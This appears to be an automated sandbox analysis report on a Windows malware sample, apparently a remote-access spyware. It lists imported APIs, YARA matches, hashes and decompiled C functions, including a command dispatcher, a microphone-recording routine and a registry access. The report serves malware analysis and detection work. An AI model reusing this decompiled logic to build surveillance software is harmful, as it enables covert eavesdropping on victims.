                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                  • String ID: alarm.wav
                                  • API String ID: 3304909635-4094641389
                                  • Opcode ID: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                  • Opcode Fuzzy Hash: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040AD91
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                    • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                  • String ID:
                                  • API String ID: 1795822965-0
                                  • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                  • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                  • time.MSVCRT ref: 004124E5
                                  • srand.MSVCRT ref: 004124F2
                                  • rand.MSVCRT ref: 00412506
                                  • rand.MSVCRT ref: 0041251A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 3357298394-1277644989
                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                  • String ID: origmsc
                                  • API String ID: 643209241-68016026
                                  • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                  • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                  • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                  • String ID: ^"A
                                  • API String ID: 1083762089-1057680782
                                  • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                  • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                  • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 15%
                                  			E00411C4C(void* __eflags, intOrPtr _a4) {
                                  				char _v20;
                                  				void* _v36;
                                  				char _v52;
                                  				int _t21;
                                  				signed int _t35;
                                  				void* _t39;
                                  				void* _t45;
                                  				void* _t61;
                                  				void* _t62;
                                  				void* _t63;
                                  				void* _t64;
                                  				void* _t65;
                                  				intOrPtr _t67;
                                  				void* _t69;
                                  				void* _t71;
                                  				void* _t72;
                                  				void* _t75;
                                  
                                  				_t75 = __eflags;
                                  				_t67 = _a4;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
                                  				_t21 = SetEvent( *(_t67 + 0x28));
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				_t71 = _t69;
                                  				_t45 = _t71;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t72 = _t71 + 0x24;
                                  				_t61 =  *_t21 - 0x61;
                                  				if(_t61 == 0) {
                                  					_push(E0040180C( &_v20, __eflags, 2));
                                  					_push(E0040180C( &_v20, __eflags, 1));
                                  					_push(E0040180C( &_v20, __eflags, 0));
                                  					_push(_t72 - 0x10);
                                  					E00411D8A(E00412881(_t29));
                                  				} else {
                                  					_t62 = _t61 - 0x3d;
                                  					if(_t62 == 0) {
                                  						E00411A24(_t45);
                                  					} else {
                                  						_t63 = _t62 - 4;
                                  						if(_t63 == 0) {
                                  							_t35 = E0040180C( &_v20, __eflags, 0);
                                  							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                  							__eflags =  *_t35;
                                  							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
                                  						} else {
                                  							_t64 = _t63 - 3;
                                  							if(_t64 == 0) {
                                  								_t39 =  *0x41c1d4;
                                  								__eflags = _t39;
                                  								if(_t39 != 0) {
                                  									SetEvent(_t39);
                                  								}
                                  							} else {
                                  								_t65 = _t64 - 1;
                                  								if(_t65 == 0) {
                                  									 *0x41c1d2 = 1;
                                  								} else {
                                  									if(_t65 == 1) {
                                  										 *0x41c1d3 = 1;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				E004017DD( &_v20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                  • SetEvent.KERNEL32(?), ref: 00411C6D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00411C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • SetEvent.KERNEL32(?), ref: 00411CF8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                  • String ID:
                                  • API String ID: 3236006214-0
                                  • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                  • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                  • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00401519(WCHAR* __eax, void* __eflags) {
                                  				char* _t4;
                                  				signed int _t5;
                                  				CHAR* _t10;
                                  				signed int _t11;
                                  				signed int _t19;
                                  				signed int _t20;
                                  				intOrPtr* _t26;
                                  				void* _t27;
                                  
                                  				_t27 = __eflags;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				CreateDirectoryW(__eax, 0);
                                  				E0041B218.wFormatTag = 1;
                                  				E0041B21A = 1;
                                  				E0041B21C = 0x1f40;
                                  				E0041B226 = 8;
                                  				 *0x41b220 = 0x1f40;
                                  				 *0x41b224 = 1;
                                  				 *0x41b228 = 0;
                                  				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t5 = atoi(_t4);
                                  				_t19 = E0041B21C; // 0x0
                                  				 *_t26 = 0x30008;
                                  				_t20 = _t19 * _t5 * 0x3c;
                                  				 *0x41b1d0 = _t20;
                                  				 *0x41b1d8 = ((E0041B226 & 0x0000ffff) >> 3) * _t20;
                                  				_t10 = waveInOpen( &E0041B210, 0xffffffff,  &E0041B218, E00401640, 0, ??);
                                  				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				0x41b1a0->lpData = _t10;
                                  				_t11 =  *0x41b1d8; // 0x0
                                  				 *0x41b1a4 = _t11;
                                  				 *0x41b1a8 = 0;
                                  				 *0x41b1ac = 0;
                                  				 *0x41b1b0 = 0;
                                  				 *0x41b1b4 = 0;
                                  				waveInPrepareHeader(E0041B210, 0x41b1a0, 0x20);
                                  				waveInAddBuffer(E0041B210, 0x41b1a0, 0x20);
                                  				waveInStart(E0041B210);
                                  				return 0;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                  • atoi.MSVCRT ref: 0040157F
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                  • waveInStart.WINMM ref: 00401633
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 1097200658-0
                                  • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
